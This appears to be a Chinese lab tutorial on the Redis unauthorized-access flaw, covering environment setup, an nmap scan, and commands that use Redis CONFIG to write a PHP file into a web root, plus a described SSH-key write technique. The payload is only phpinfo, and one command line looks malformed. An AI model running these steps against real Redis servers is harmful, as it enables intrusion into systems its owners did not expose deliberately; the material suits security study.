Redis未授权访问漏洞

    技术2022-07-16  76

    前言

    Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,

    如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。

    环境搭建

    wget http://download.redis.io/releases/redis-2.8.17.tar.gz

    下载之后解压出来

    tar -zxvf redis-2.8.17.tar.gz

    make 进行编译,警告我们可以忽略

    make结束后,进入src目录:cd src,将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)

    cp redis-server /usr/bin/

    cp redis-cli /usr/bin/

     

    返回目录redis-2.8.17,将redis.conf也拷贝到/etc/目录下:

    接着使用/etc/目录下的reids.conf文件中的配置启动redis服务:

    由于我端口重复了,所以修改了下端口

    port修改成6378

    nmap检测

    nmap -sV -p- 192.168.111.129

    可以看到redis开启了

    这里我们为了方便做事,安装个redis clinet

    地址:https://github.com/caoxinyu/RedisClient/releases

    由于我们换了端口这里也换上,无需密码即可登录

    可以看出redis未启用认证。

    利用redis写webshell

    利用条件

    靶机redis未授权,在攻击机能用redis clinet连接,如上图,并未登录验证

    靶机开启web服务,并且知道网站路径,还需要具有文件读写增删改查权限

    靶机网站路径:/var/www/html/

    我们开启http服务

    service apache2 start

    这里我们调出Console

    config set dir /var/www/html

    config set dbfilename test.php

    config set webshell "<?php phpinfo(); ?>"

    save

     

    Processed: 0.011, SQL: 9